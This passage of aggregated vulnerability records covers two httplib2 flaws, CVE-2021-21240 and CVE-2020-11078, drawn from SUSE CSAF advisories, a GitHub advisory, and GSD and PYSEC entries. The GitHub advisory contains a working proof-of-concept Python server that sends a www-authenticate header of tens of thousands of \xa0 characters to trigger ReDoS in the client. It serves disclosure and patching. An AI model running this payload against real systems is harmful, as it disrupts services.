Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2021:1806-1
Vulnerability from csaf_opensuse
Published
2021-07-11 12:03
Modified
2021-07-11 12:03
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 fixes the following issues:
- Update to version 0.19.0 (bsc#1182053).
- CVE-2021-21240: Fixed regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed unescaped part of uri where an attacker could change request headers and body (bsc#1182053).
Patchnames
openSUSE-SLE-15.3-2021-1806
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 fixes the following issues:\n\n- Update to version 0.19.0 (bsc#1182053).\n- CVE-2021-21240: Fixed regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed unescaped part of uri where an attacker could change request headers and body (bsc#1182053).\n", title: "Description of the patch", }, { category: "details", text: "openSUSE-SLE-15.3-2021-1806", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2021_1806-1.json", }, { category: "self", summary: "URL for openSUSE-SU-2021:1806-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/DTGWJY2VML3YAAFAOOYJAQP5SZ4X6XWG/", }, { category: "self", summary: "E-Mail link for openSUSE-SU-2021:1806-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/DTGWJY2VML3YAAFAOOYJAQP5SZ4X6XWG/", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-07-11T12:03:47Z", generator: { date: "2021-07-11T12:03:47Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2021:1806-1", initial_release_date: "2021-07-11T12:03:47Z", revision_history: [ { date: "2021-07-11T12:03:47Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-3.3.1.noarch", product: { name: "python2-httplib2-0.19.0-3.3.1.noarch", product_id: "python2-httplib2-0.19.0-3.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-3.3.1.noarch", product: { name: "python3-httplib2-0.19.0-3.3.1.noarch", product_id: "python3-httplib2-0.19.0-3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "openSUSE Leap 15.3", product: { name: "openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.3", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-3.3.1.noarch as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-3.3.1.noarch as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.3", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-07-11T12:03:47Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Leap 15.3:python2-httplib2-0.19.0-3.3.1.noarch", "openSUSE Leap 15.3:python3-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-07-11T12:03:47Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
ghsa-93xj-8mrv-444m
Vulnerability from github
Published
2021-02-08 19:41
Modified
2024-09-23 16:13
Severity ?
Summary
Regular Expression Denial of Service (REDoS) in httplib2
Details
Impact
A malicious server which responds with long series of \xa0 characters in the www-authenticate header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.
Patches
Version 0.19.0 contains new implementation of auth headers parsing, using pyparsing library. https://github.com/httplib2/httplib2/pull/182
Workarounds
py
import httplib2
httplib2.USE_WWW_AUTH_STRICT_PARSING = True
Technical Details
The vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/init.py#L336-L338
The section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:
\s*[^ \t\r\n=]+\s*=
Since all three infinitely repeating groups accept the non-breaking space character \xa0, a long string of \xa0 causes catastrophic backtracking.
The complexity is cubic, so doubling the length of the malicious string of \xa0 makes processing take 8 times as long.
Reproduction Steps
Run a malicious server which responds with
www-authenticate: x \xa0\xa0\xa0\xa0x
but with many more \xa0 characters.
An example malicious python server is below:
```py from http.server import BaseHTTPRequestHandler, HTTPServer
def make_header_value(n_spaces): repeat = "\xa0" * n_spaces return f"x {repeat}x"
class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(401) self.send_response_only(401) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65512 # Max header line length 65536 ) value = make_header_value(n_spaces) self.send_header("www-authenticate", value) # This header can actually be sent multiple times self.end_headers()
if name == "main": HTTPServer(("", 1337), Handler).serve_forever() ```
Connect to the server with httplib2:
py
import httplib2
httplib2.Http(".cache").request("http://localhost:1337", "GET")
To benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000
References
Thanks to Ben Caller (Doyensec) for finding vulnerability and discrete notification.
For more information
If you have any questions or comments about this advisory: * Open an issue in httplib2 * Email current maintainer at 2021-01
{ affected: [ { package: { ecosystem: "PyPI", name: "httplib2", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "0.19.0", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2021-21240", ], database_specific: { cwe_ids: [ "CWE-400", ], github_reviewed: true, github_reviewed_at: "2021-02-08T19:41:34Z", nvd_published_at: "2021-02-08T20:15:00Z", severity: "HIGH", }, details: "### Impact\nA malicious server which responds with long series of `\\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.\n\n### Patches\nVersion 0.19.0 contains new implementation of auth headers parsing, using pyparsing library.\nhttps://github.com/httplib2/httplib2/pull/182\n\n### Workarounds\n```py\nimport httplib2\nhttplib2.USE_WWW_AUTH_STRICT_PARSING = True\n```\n\n### Technical Details\n\nThe vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338\n\nThe section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:\n\n \\s*[^ \\t\\r\\n=]+\\s*=\n\nSince all three infinitely repeating groups accept the non-breaking space character `\\xa0`, a long string of `\\xa0` causes catastrophic backtracking.\n\nThe complexity is cubic, so doubling the length of the malicious string of `\\xa0` makes processing take 8 times as long.\n\n### Reproduction Steps\n\nRun a malicious server which responds with\n\n www-authenticate: x \\xa0\\xa0\\xa0\\xa0x\n\nbut with many more `\\xa0` characters.\n\nAn example malicious python server is below:\n\n```py\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef make_header_value(n_spaces):\n repeat = \"\\xa0\" * n_spaces\n return f\"x {repeat}x\"\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.log_request(401)\n self.send_response_only(401) # Don't bother sending Server and Date\n n_spaces = (\n int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences\n if len(self.path) > 1 else\n 65512 # Max header line length 65536\n )\n value = make_header_value(n_spaces)\n self.send_header(\"www-authenticate\", value) # This header can actually be sent multiple times\n self.end_headers()\n\nif __name__ == \"__main__\":\n HTTPServer((\"\", 1337), Handler).serve_forever()\n```\n\nConnect to the server with httplib2:\n\n```py\nimport httplib2\nhttplib2.Http(\".cache\").request(\"http://localhost:1337\", \"GET\")\n```\n\nTo benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000\n\n\n### References\nThanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2021-01](mailto:temotor@gmail.com)", id: "GHSA-93xj-8mrv-444m", modified: "2024-09-23T16:13:16Z", published: "2021-02-08T19:41:59Z", references: [ { type: "WEB", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { type: "WEB", url: "https://github.com/httplib2/httplib2/pull/182", }, { type: "WEB", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { type: "PACKAGE", url: "https://github.com/httplib2/httplib2", }, { type: "WEB", url: "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2021-16.yaml", }, { type: "WEB", url: "https://pypi.org/project/httplib2", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", type: "CVSS_V3", }, { score: "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P", type: "CVSS_V4", }, ], summary: "Regular Expression Denial of Service (REDoS) in httplib2", }
gsd-2021-21240
Vulnerability from gsd
Modified
2023-12-13 01:23
Details
httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.
Aliases
Aliases
{ GSD: { alias: "CVE-2021-21240", description: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", id: "GSD-2021-21240", references: [ "https://www.suse.com/security/cve/CVE-2021-21240.html", "https://access.redhat.com/errata/RHSA-2021:2116", "https://advisories.mageia.org/CVE-2021-21240.html", "https://security.archlinux.org/CVE-2021-21240", ], }, gsd: { metadata: { exploitCode: "unknown", remediation: "unknown", reportConfidence: "confirmed", type: "vulnerability", }, osvSchema: { aliases: [ "CVE-2021-21240", ], details: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", id: "GSD-2021-21240", modified: "2023-12-13T01:23:10.963057Z", schema_version: "1.4.0", }, }, namespaces: { "cve.org": { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2021-21240", STATE: "PUBLIC", TITLE: "Regular Expression Denial of Service in httplib2", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "httplib2", version: { version_data: [ { version_value: "< 0.19.0", }, ], }, }, ], }, vendor_name: "httplib2", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], }, impact: { cvss: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-400 Uncontrolled Resource Consumption", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", refsource: "CONFIRM", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { name: "https://github.com/httplib2/httplib2/pull/182", refsource: "MISC", url: "https://github.com/httplib2/httplib2/pull/182", }, { name: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", refsource: "MISC", url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { name: "https://pypi.org/project/httplib2", refsource: "MISC", url: "https://pypi.org/project/httplib2", }, ], }, source: { advisory: "GHSA-93xj-8mrv-444m", discovery: "UNKNOWN", }, }, "gitlab.com": { advisories: [ { affected_range: "<0.19.0", affected_versions: "All versions before 0.19.0", cvss_v2: "AV:N/AC:L/Au:N/C:N/I:N/A:P", cvss_v3: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", cwe_ids: [ "CWE-1035", "CWE-400", "CWE-937", ], date: "2021-02-12", description: "httplib2 is a comprehensive HTTP client library for Python. In httplib2, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.", fixed_versions: [ "0.19.0", ], identifier: "CVE-2021-21240", identifiers: [ "CVE-2021-21240", "GHSA-93xj-8mrv-444m", ], not_impacted: "All versions starting from 0.19.0", package_slug: "pypi/httplib2", pubdate: "2021-02-08", solution: "Upgrade to version 0.19.0 or above.", title: "Uncontrolled Resource Consumption", urls: [ "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", ], uuid: "6520f221-0fd9-4d4c-850e-b8b9d243f85f", }, ], }, "nvd.nist.gov": { configurations: { CVE_data_version: "4.0", nodes: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*", cpe_name: [], versionEndExcluding: "0.19.0", vulnerable: true, }, ], operator: "OR", }, ], }, cve: { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2021-21240", }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "en", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "en", value: "CWE-400", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", refsource: "MISC", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { name: "https://github.com/httplib2/httplib2/pull/182", refsource: "MISC", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { name: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", refsource: "CONFIRM", tags: [ "Exploit", "Mitigation", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { name: "https://pypi.org/project/httplib2", refsource: "MISC", tags: [ "Product", "Third Party Advisory", ], url: "https://pypi.org/project/httplib2", }, ], }, }, impact: { baseMetricV2: { acInsufInfo: false, cvssV2: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, severity: "MEDIUM", userInteractionRequired: false, }, baseMetricV3: { cvssV3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, }, }, lastModifiedDate: "2021-02-12T14:56Z", publishedDate: "2021-02-08T20:15Z", }, }, }
pysec-2021-16
Vulnerability from pysec
Published
2021-02-08 20:15
Modified
2021-02-12 14:56
Details
httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.
Impacted products
| Name | purl |
|---|---|
| httplib2 | pkg:pypi/httplib2 |
Aliases
{ affected: [ { package: { ecosystem: "PyPI", name: "httplib2", purl: "pkg:pypi/httplib2", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "bd9ee252c8f099608019709e22c0d705e98d26bc", }, ], repo: "https://github.com/httplib2/httplib2", type: "GIT", }, { events: [ { introduced: "0", }, { fixed: "0.19.0", }, ], type: "ECOSYSTEM", }, ], versions: [ "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.7.4", "0.7.5", "0.7.6", "0.7.7", "0.8", "0.9", "0.9.1", "0.9.2", "0.10.3", "0.11.0", "0.11.1", "0.11.3", "0.12.0", "0.12.1", "0.12.3", "0.13.0", "0.13.1", "0.14.0", "0.15.0", "0.16.0", "0.17.0", "0.17.1", "0.17.2", "0.17.3", "0.17.4", "0.18.0", "0.18.1", ], }, ], aliases: [ "CVE-2021-21240", "GHSA-93xj-8mrv-444m", ], details: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", id: "PYSEC-2021-16", modified: "2021-02-12T14:56:00Z", published: "2021-02-08T20:15:00Z", references: [ { type: "FIX", url: 